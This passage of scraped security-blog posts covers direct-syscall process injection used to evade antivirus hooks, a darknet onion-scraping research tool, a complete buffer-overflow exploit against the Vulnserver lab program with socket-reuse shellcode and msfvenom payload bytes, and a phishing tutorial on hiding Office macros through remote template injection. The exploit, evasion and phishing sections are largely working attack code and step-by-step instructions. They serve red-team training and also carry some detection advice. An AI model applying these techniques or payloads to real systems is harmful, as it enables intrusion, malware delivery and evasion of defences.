    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, pi.hProcess, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL);
}

Let’s go through exactly how this works. First, common.asm contains the proper Windows Syscall integer values for many of the undocumented Windows functions. Common.asm not only maps the function name to the proper syscall integer but, it also takes OS Version into account in order to mitigate syscall issues subject to value changes over time. Let’s take a look at the NtAllocateVirtualMemory() syscall assembly that SysWhispers generated for us.

NtAllocateVirtualMemory PROC
	mov rax, gs:[60h]                                 ; Load PEB into RAX.
NtAllocateVirtualMemory_Check_X_X_XXXX:               ; Check major version.
	cmp dword ptr [rax+118h], 6
	je  NtAllocateVirtualMemory_Check_6_X_XXXX
	cmp dword ptr [rax+118h], 10
	je  NtAllocateVirtualMemory_Check_10_0_XXXX
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
	cmp dword ptr [rax+11ch], 1
	je  NtAllocateVirtualMemory_Check_6_1_XXXX
	cmp dword ptr [rax+11ch], 2
	je  NtAllocateVirtualMemory_SystemCall_6_2_XXXX
	cmp dword ptr [rax+11ch], 2
	je  NtAllocateVirtualMemory_SystemCall_6_3_XXXX
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_6_1_XXXX:               ; Check build number for Windows 7.
	cmp dword ptr [rax+120h], 7600
	je  NtAllocateVirtualMemory_SystemCall_6_1_7600
	cmp dword ptr [rax+120h], 7601
	je  NtAllocateVirtualMemory_SystemCall_6_1_7601
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_10_0_XXXX:              ; Check build number for Windows 10.
	cmp dword ptr [rax+120h], 10240
	je  NtAllocateVirtualMemory_SystemCall_10_0_10240
	cmp dword ptr [rax+120h], 10586
	je  NtAllocateVirtualMemory_SystemCall_10_0_10586
	cmp dword ptr [rax+120h], 14393
	je  NtAllocateVirtualMemory_SystemCall_10_0_14393
	cmp dword ptr [rax+120h], 15063
	je  NtAllocateVirtualMemory_SystemCall_10_0_15063
	cmp dword ptr [rax+120h], 16299
	je  NtAllocateVirtualMemory_SystemCall_10_0_16299
	cmp dword ptr [rax+120h], 17134
	je  NtAllocateVirtualMemory_SystemCall_10_0_17134
	cmp dword ptr [rax+120h], 17763
	je  NtAllocateVirtualMemory_SystemCall_10_0_17763
	cmp dword ptr [rax+120h], 18362
	je  NtAllocateVirtualMemory_SystemCall_10_0_18362
	cmp dword ptr [rax+120h], 18363
	je  NtAllocateVirtualMemory_SystemCall_10_0_18363
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_SystemCall_6_1_7600:          ; Windows 7 SP0
	mov eax, 0015h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
	mov eax, 0015h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
	mov eax, 0016h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
	mov eax, 0017h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_Unknown:           ; Unknown/unsupported version.
	ret
NtAllocateVirtualMemory_Epilogue:
	mov r10, rcx
	syscall
	ret
NtAllocateVirtualMemory ENDP

Subject to the OS Versioning, the NtAllocateVirualMemory instructions will set the correct integer value and load that value into the EAX Register. Next, it will jmp to NtAllocateVirtuallMemory_Epilouge which makes the syscall. The Windows Version that I am developing on is Windows 10.0.17763 (1809) which means the proper syscall value for NtAllocateVirtualMemory is 0x18 or decimal 24. And just to double check, we can look at a table that details all the functions and syscall values subject to OS Version here.

Let’s look at this in a debugger. I set a break point on NtAllocateVirtualMemory within the C++ source. Once I hit that break point I will step through the common.asm instructions until the EAX Register is updated which means an OS Version match was found and the Syscall Integer value was loaded into EAX (lower 32-bits of RAX).

NOTE: If you’re not sure how x86 and x86_64 bit registers correlate to each other here is a fantastic graphic that details all the registers:

How x86 registers fit into x86_64 registers

As expected, we’ve matched one of the OS Version values and the EAX register is set to 0x18. Next, we jump to the epilogue to execute the NtAllocateVirtualMemory syscall. Keep in mind, we did not load any external functions to help us execute this syscall. We directly issued this syscall.

Direct Syscall observed in the Visual Studio Debugger

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	288
Total Amount of Memory User	186 KB

API Monitor Analysis of Low-Level Direct Syscalls

We don’t see ANY of the standard API calls we saw with the High-Level and Medium-Level API calls. That’s because we did not load any external resources to conduct the syscall. But, the Syscall still happened, and we can confirm that by reviewing the Sysmon event logs. Remember, Sysmon hooking is running in Kernel-Land (SYSTEM) and as such, we can’t really hide ourselves from it unless we disable it (Need to be admin).

Sysmon Analysis

Once again, Sysmon was able to hook and log the five (5) events.

Conclusion

Red Team

The lower we can go, the better. We can evade AV / EDR systems that hook in User-Land and do all kinds of fancy things by rolling our own syscalls. Mixing this technique with a plethora of others such as Arbitrary Code Guard, off-binary payload ingestion, etc. can allow us to operate with less noise as well as arm Blue Team with new detection capabilities.

Blue Team

Use Sysmon! As we saw, the Sysmon driver was able to hook all of our remote thread activity. This is a Free tool with several features that should be rolled into your detection processes. For more information:

Black Hills Information Security Blog – Getting Started with Sysmon
Black Hills Information Security Webcast – Implementing Sysmon and Applocker
ion-storm’s excellent (starter) Sysmon Config

Process Injection Part 1 | CreateRemoteThread()
Joshua

Hunting Onions – A Framework for Simple Darknet Analysis

Sevro Security

Joshua

8 February 2020 at 18:12

Sevro Security
Hunting Onions – A Framework for Simple Darknet Analysis

One of the things I spend a-lot of time doing is researching the current threat landscape. I dedicate a-lot of time to pulling samples from Virus Total, reversing, analyzing, and searching for known/unknown IOC’s everywhere I can in order to properly mimic a threat actor. One of the places I search happens to be via Tor (AKA: the darknet). My method on how I connect to TOR varies and this post is not dedicated on how to stay safe and avoid data leakage. Rather, it’s to demonstrate a novel approach to obtaining .Onion address and analyzing them in a safe and efficient manner.

TL;DR: A full listing of classes and functions are detailed within the Github Wiki.

How Onion Hunter Works

NOTE: Onion Hunter does not download images, malware, full site source code, etc.. This is to protect the user and the system that is running the analysis. There’s a ton of bad things that can easily get you into trouble and for that reason alone, only the HTML of the page in question is analyzed and nothing more.

Onion-Hunter is a Python3 based framework that analyzes Onion site source code for user defined keywords and stores relevant data to a SQLite3 backend. Currently, the framework utilizes several sources to aggregate Onion addresses:

Reddit subreddits: A predefined set of subreddits are populated within the config.py. that are scraped for any Onion addresses.
Tor Deep Paste: This has turned out to be a very good source.
Fresh Onions Sources: Each onion address is analyzed to determine if it’s a fresh onion source (i.e., contains new/mapped onions) and if so, is saved to the FRESH_ONION_SOURCES table.
Additional_onions.txt: Any tertiary onion address, that is any address found that is not immediately analyzed, is saved to docs/additional_onions.txt for later analysis.

A researcher can also analyze individual or a text file filled with Onion address if they happen to come upon something interesting that warrants analysis and categorization.

Once valid .Onion addresses have been found, they’re analyzed by issuing a GET request to the .Onion address and searching the index source (HTML) for keywords that are per-defined by the researcher.

The Database

A SQLite3 backend is used to maintain records of all analyzed Onion addresses as well as a record of all Onions that have been categorized a probable Fresh Onion Domains. There are a total of three (3) tables that are used:

ONIONS – Contains all Onion addresses observed and is by far, the most interesting table for analysis.
FRESH_ONION_SOURCES – Any onion address that 50+ unique addresses listed on the front page and also include fresh onion keywords is categorized as a probable Fresh Onion Domain and saved to this table.
KNOWN_ONIONS – This table is currently unused. It was designed for reporting purposes. That is, if for any reason you want to conduct analysis on weekly/monthly trends (for example) attributes of previously analyzed Onions can be added to this table and therefore avoid duplication is reporting.

CREATE TABLE ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DATE_FOUND TEXT NOT NULL,
DOMAIN_SOURCE TEXT NOT NULL,
URI TEXT NOT NULL,
URI_TITLE TEXT,
DOMAIN_HASH TEXT NOT NULL,
KEYWORD_MATCHES TEXT,
KEYWORD_MATCHES_SUM INT,
INDEX_SOURCE TEXT NOT NULL);

CREATE TABLE FRESH_ONION_SOURCES
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
URI TEXT NOT NULL,
DOMAIN_HASH TEXT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

CREATE TABLE KNOWN_ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DOMAIN_HASH TEXT NOT NULL,
DATE_REPORTED TEXT,
REPORTED INT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

An example of what the data looks like within the ONIONS table can be seen in the image below. For simply viewing the data, I like to used DB Browser for SQLite. However, all heavy operations should be done in code as this application can be very clunky.

Viewing the Onions table within DM browser

User Configuration

As stated above, the only method of domain/site analysis is by a simple keyword search. A user must supply the following within the src/config.py:

class configuration:

    def __init__(self):
        # Reddit API Variables
        self.r_username = ""
        self.r_password = ""
        self.r_client_id = ""
        self.r_client_secret = ""
        self.r_user_agent = ""

        # Reddit SubReddits to Search:
        self.sub_reddits = ["onions", "deepweb", "darknet", "tor", "conspiracy", "privacy", "vpn", "deepwebintel",
                            "emailprivacy", "drugs", "blackhat", "HowToHack", "netsec", "hacking",
                            "blackhatunderground", "blackhats", "blackhatting", "blackhatexploits",
                            "reverseengineering"]

        # Keywords to Search each Onions Address for.
        ## Searches the .onion source code retrieved via an HTTP GET request.
        self.keywords = ["Hacker", "Flawwedammy"]

Improvements

There are a lot of improvements that can be made to the current version and I intend on making some of these changes in 2020. For example, I would like to utilize duckduckgo API as well as Reddit to start the initial searching. There also may be reliable sources that keep tabs on Fresh Onion databases that are active on Tor. These information sources would be more reliable going forward.

Other improvements such as database optimization, site categorization, and user-defined analysis techniques are slotted as well.

Hunting Onions – A Framework for Simple Darknet Analysis
Joshua

Vulnserver KSTET Socket Re-use

Sevro Security

Joshua

20 November 2019 at 23:21

Sevro Security
Vulnserver KSTET Socket Re-use

In a previous post, Vulnserver KSTET Egg Hunter, we looked at how we can use an egghunter to obtain code execution within a larger chunk of memory. In this post, we will look at the KSTET Socket re-use WS2_32.dll recv() function and how we can re-use this to pull in a larger chunk of shellcode within a buffer we allocate ourselves. In regards to Vulnserver.exe, the recv() function is used anytime we send data to the socket. The data is then parsed by the server and decides what to do with it.

Prerequisites:

Vulnserver.exe
Immunity or Ollydbg – I will be using Immunity
Mona.py
Windows VM – I am using a Windows XP Professional host

Resources:

I’m going to skip some of the set-up assuming you understand how to attach a debugger to a process or start a process within a debugger. If you don’t, go ahead and read some of my other buffer overflow tutorials.

The Crash

Part of why I decided to build this tutorial us because I am currently studying for the OSCE. As such, we are going to use the Spike Fuzzer (Native in Kali) to fuzz the VulnServer.exe application and just like the egg hunter tutorial, we will be fuzzing the KSTET parameter. Here is our Spike Fuzzing template (kstet.spk):

s_readline();
s_string("KSTET ");
s_string_variable("0");
s_string("\r\n");
s_readline();

The VulnServer listens on port 9999 and is residing at an IP Address: 192.168.5.130. So, our Spike Fuzzer syntax will be:

generic_send_tcp 192.168.5.130 9999 kstet.spk 0 0

During any fuzzing, it’s a good idea to keep a WireShark instance running in the background so you can manually analyze the packets if a crash occurs.

After less than 2 seconds, we have a visible crash that looks to have overwritten EIP and EBP.

Looking at Wireshark we see that the last valid connection contained the following data:

Buffer Overflow Standard Steps

This is the repetitive part of any Buffer Overflow:

Determine the offset in which we overwrote EIP.
Find a JMP ESP Instruction we can use.
Overwrite EIP with the JMP ESP address and control the execution flow.

Determine Offset:

We create a standard pattern using the Metasploit Frameworks pattern_create.rb. This generates a unique string n bytes long that is used to determine the actual offset of the overwrite. The syntax for the ruby script is:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

Build a Python proof of concept to crash the application similar to the Spike Fuzzer:

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

pattern = ("""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq""")

buf = ""
buf += "KSTET /.:/"
buf += pattern
buf += "\r\n"

s.send(buf)

We send the payload, overwrite EIP with the pattern, and now determine the proper offset

After we have the correct offset, we can build a proof of concept that shows two things:

We have control of EIP and therefore have control of code execution
How much space after the overwrite we have to play with (i.e. store our shellcode)

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += "B" * 4
buf += "C" * 500
buf += "\r\n"

s.send(buf)

Analysis of the Stack after the overflow

We control EIP and we only have 0x10 Bytes of room for shellcode. That’s not enough for anything. However, we have 0x44 Bytes above ESP that we can use to build something useful. In the previous KSTET tutorial, we used this space for an egg-hunter. Now, we are going to build our own shellcode to re-use the WS2_32.recv() function.

Find JMP ESP:

I personally like to use Mona.py with Immunity Debugger to help determine a valid JMP ESP. There are tons of ways to find a proper JMP ESP address, this one just fits my needs.

Verify we have EIP Control:

Set a breakpoint at the JMP ESP address you selected. Amend you python script to include the JMP ESP address and the EIP overwrite and verify you now hit the JMP ESP address and get back to your code (in this case, the C’s).

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "C" * 500
buf += "\r\n"

s.send(buf)

A Short Jump

In order to get more room to build our custom shellcode, we need to make a short jump to the top of the A’s. In the start of this tutorial, I posted a link describing the JMP SHORT instructions. Basically, these are two (2) byte instructions that will help us move around in memory without taking up a shit ton of space.

In this case, we want to get to address 0x00B8F9C6. An easy way to build the shellcode is write the instructions directly within Immunity by hitting the space bar and typing in the assembly.

As you can see, from the blue text on the left of the Assembly instructions, our opcode is going to be \xEB\xB8. We can simply add this into our python script and verify we have in-fact jumped backwards to our required address.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "\xEB\xB8"               # JMP SHORT
buf += "C" * 500
buf += "\r\n"

s.send(buf)

WS2_32.recv() Review

Before we dig into writing custom shellcode, let’s analyze what is happening locally when recv() is called in the non-altered code.Let’s also define some terms and parameters that are necessary to fully understand before we understand the exploit.

The recv() function is part of the winsock.h header and takes a total of 4 parameters:

SOCKET – This is a Socket Descriptor and defines a valid socket. It’s dynamic and changes each time the binary/exe is run.
*buf – A pointer in memory where we want to start storing what is received from the socket connection.
len – The size of the buffer in Bytes
flags – Will always be set to 0 in our case. We essentially do not use this but need it to complete the function call.

Three (3) of the four (4) parameters can be generated by us, the attacker. We easily make up our own values, pop them onto the stack and have a good ol’ day. But, the SOCKET descriptor is the odd man/woman out. This is set dynamically, by the program. It is, however, set predictably and as such we can analyze a live recv() call in action and find where it’s obtaining the SOCKET descriptor from. Once we know where it comes from, we can dynamically pull that value in with our custom shellcode to make our recv() call as legitimate as the original.

Analyze a Legitimate recv():

In your debugger, start a fresh run of vulnserver.exe and put it into a running state. To make sure the debugger (olly or immunity) has analyzed the code properly, hit CTRL+A. This will tell the debugger to analyze the assembly and point out any objective function calls. With this analyzed, look for the recv() function call.

From left to right, the first picture is where the recv() function is called within the program. The second picture is where we land when the CALL is executed. The address in the second image 0x0040252C is very important as that is that address we will CALL at the very end of our custom shellcode.

Next, let’s place a breakpoint at the CALL shown in the first image (leftmost image), and execute our overflow python script so we can observe the legitimate recv() function call.

When the python script is executed, we hit our breakpoint and can view the recv() parameters cleanly located on the stack for us.

Analysis of a valid WS2_32.recv function call

SOCKET DESCRIPTOR = 0x00000080
BUFFER START ADDR = 0x003E4AD0
BUFFER LENGTH = 0x00001000 (4096 Bytes base 10)
FLAGS = 0x00000000

Again, at this point, we only care where that Socket Descriptor came from. If we set our breakpoint a few instructions above the CALL <JMP.&WS2_32.recv> we find that MOV EAX, DWORD PTR SS:[EBP-420] is responsible for pulling in the Socket Descriptor. Cool, let’s do some basic math:

EBP = 00B8FFB4 and if we calculate: (00B8FFB4 – 420) = 00B8FB94‬.

If we navigate to this address in the debugger, we should find our Socket Descriptor and, we do.

Confirming we have found the Socket Descriptor

Custom Shellcode

Now that we have the location of the Socket Descriptor, we can start to build our custom shellcode to setup the stack for our evil recv() function call. Since the Stack grow from bottom up, we need to build our stack with that in mind starting by adding the FLAG parameter first and the Socket Descriptor last.

The easiest way to build your custom shellcode is simply to do it in the Debugger. Set a breakpoint at your JMP ESP, get to you JMP instruction and start building your shellcode. Below is an example on how I setup my Stack:

recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

Let’s go through this step by step:

Lines 2-3: I found that the stack was not aligned after the second payload was sent. This aligns the stack for our second payload
Lines 4-5: We XoR the EDX Register by itself to make it 0 (0x00000000) and PUSH it onto the stack. This will serve as our FLAG parameter.
Lines 6-8: We cannot have a null byte (0x00) in our shellcode so, we add 0x4 to EDX and shift it left by 1 Byte (8-bits) to give us 0x400 This serves as our Buffer Size.
Lines 9-12: Zero out EDX with XoR, MOV 0xB8F9FB90 into EDX, shift right to get rid of 0x90 and get our 0x00 for a final value of 0x00B8F9FB. This serves as our Buffer Start Address.
Lines 13-15: Load Socket Descriptor addr. into ECX, PUSH the value of the data located at ECX (denoted as [ECX]not ECX, note the difference). This serves as the Socket Descriptor.
Lines 16-18: Load the address of WS2_32.recv, that we found when we analyzed the legitimate recv(), into EDX and CALL EDX to complete the function call.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)

Exploitation

All we have to do is generate a second payload and send it right after our overflow payload. Since we have tricked vulnserver into running the recv() function, it will take our second send data and store it at the buffer address we specified. Let’s test this out with a payload of 0xCC (Int 3) so that the program will halt when it hits our shellcode.

Secondary payload made it to our memory location

Let’s add some basic shellcode to pop calc.exe and verify that our exploit works.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)                             # Stage 1 Payload Send

# msfvenom -p windows/exec CMD=calc.exe -b '\x00' --var-name calc -f python
calc =  b""
calc += b"\xdb\xdc\xd9\x74\x24\xf4\x5f\xb8\x43\x2c\x57\x7b\x2b"
calc += b"\xc9\xb1\x31\x31\x47\x18\x83\xc7\x04\x03\x47\x57\xce"
calc += b"\xa2\x87\xbf\x8c\x4d\x78\x3f\xf1\xc4\x9d\x0e\x31\xb2"
calc += b"\xd6\x20\x81\xb0\xbb\xcc\x6a\x94\x2f\x47\x1e\x31\x5f"
calc += b"\xe0\x95\x67\x6e\xf1\x86\x54\xf1\x71\xd5\x88\xd1\x48"
calc += b"\x16\xdd\x10\x8d\x4b\x2c\x40\x46\x07\x83\x75\xe3\x5d"
calc += b"\x18\xfd\xbf\x70\x18\xe2\x77\x72\x09\xb5\x0c\x2d\x89"
calc += b"\x37\xc1\x45\x80\x2f\x06\x63\x5a\xdb\xfc\x1f\x5d\x0d"
calc += b"\xcd\xe0\xf2\x70\xe2\x12\x0a\xb4\xc4\xcc\x79\xcc\x37"
calc += b"\x70\x7a\x0b\x4a\xae\x0f\x88\xec\x25\xb7\x74\x0d\xe9"
calc += b"\x2e\xfe\x01\x46\x24\x58\x05\x59\xe9\xd2\x31\xd2\x0c"
calc += b"\x35\xb0\xa0\x2a\x91\x99\x73\x52\x80\x47\xd5\x6b\xd2"
calc += b"\x28\x8a\xc9\x98\xc4\xdf\x63\xc3\x82\x1e\xf1\x79\xe0"
calc += b"\x21\x09\x82\x54\x4a\x38\x09\x3b\x0d\xc5\xd8\x78\xe1"
calc += b"\x8f\x41\x28\x6a\x56\x10\x69\xf7\x69\xce\xad\x0e\xea"
calc += b"\xfb\x4d\xf5\xf2\x89\x48\xb1\xb4\x62\x20\xaa\x50\x85"
calc += b"\x97\xcb\x70\xe6\x76\x58\x18\xc7\x1d\xd8\xbb\x17"


payload = ""
payload += calc
payload += "\r\n"

s.send(payload)                           # Stage 2 Payload Send

Shellcode injection to pop calc.exe after exploit

Vulnserver KSTET Socket Re-use
Joshua

Dynamic Office Template Injection

Sevro Security

Joshua

12 September 2019 at 23:00

Sevro Security
Dynamic Office Template Injection

You’ve sent your phishing email with a malicious Microsoft Office document. You pored your blood, sweat, and tears into that sexy Macro of yours. However, modern appliances can easily run that macro in a sandbox and determine if it’s evil or benign.

Sure, you could use common techniques to enumerate if you’re in a sandbox or not but, that requires more code and for the love of god, we’ve all written too much VBA as is. Or, you could encrypt the document and supply the password within the email/title but, some sandboxes have caught on to that as well or maybe the user is too lazy. Another option is to use Dynamic Office Template Injection.

Template Injection

There are some massive benefits to using template injection such as:

Ability to send a Docx and not a Docm
Macro does not “Live” within the Docx
Can “Hot Swap” payloads
Can remotely turn macros on and off

Template injection works via the following process (for the example moving forward, I will be using Microsoft Word):

Build your malicious macro into a .Dotm (Microsoft Template containing a Macro).
Host your .Dotm publicly via an S3 bucket, GCP Bucket, DO Space, etc.
Create a .Docx document with a Microsoft Template.
Unzip the .Docx and modify a single XML file
Zip contents back up and change .zip to .Docx

Create the Dotm Document

Here is the Macro that we will add to the .dotm document:

Sub AutoOpen()

    Dim Execute As Variant
    Execute = Shell("calc.exe", vbNormalFocus)

End Sub

In the example case, the Macro simply opens up calc.exe, as all good malware does in its infancy. Once we have the Macro working, we make sure to save the Word Document as a .dotm.

Create and test your macro — Calc.exe Macro

Create the Docx Document

When creating the .docx document, you need to select a real Microsoft Template. I like to use a resume template as they usually do not contain images or extremely fancy formatting.

Select an office template — Select a Template

Now that we have both documents created [example.dotm, resume.docx], let’s host example.dotm on a Digital Ocean space.

Host the macro enabled template — Host the example.dotm

Get the URI to example.dotm and move back to where we have the resume.docx. If you have 7-zip, winzip, etc., right click resume.docx and select Extract Here. If successful, you will be presented with a few new folders and a single xml file as seen below.

Unzip the .docx document — After resume.docx Unzipping

Navigate to word –> _rels –> and open the settings.xml.rels in any text editor. We are going to replace the Target variables data with our example.dotm URI.

settings.xml.rels before the edit. — Before Replacement

settings.xml.rels after the edit. — After Replacement

Save settings.xml.rels and go back to the root directory of the original .docx. Select all the files/directories that were generated from the unzipping:

_rels
customXml
docProps
word
[Content_Types].xml

Add them all to a single .zip archive and then change the .zip suffix to a .docx suffix to complete the transformation.

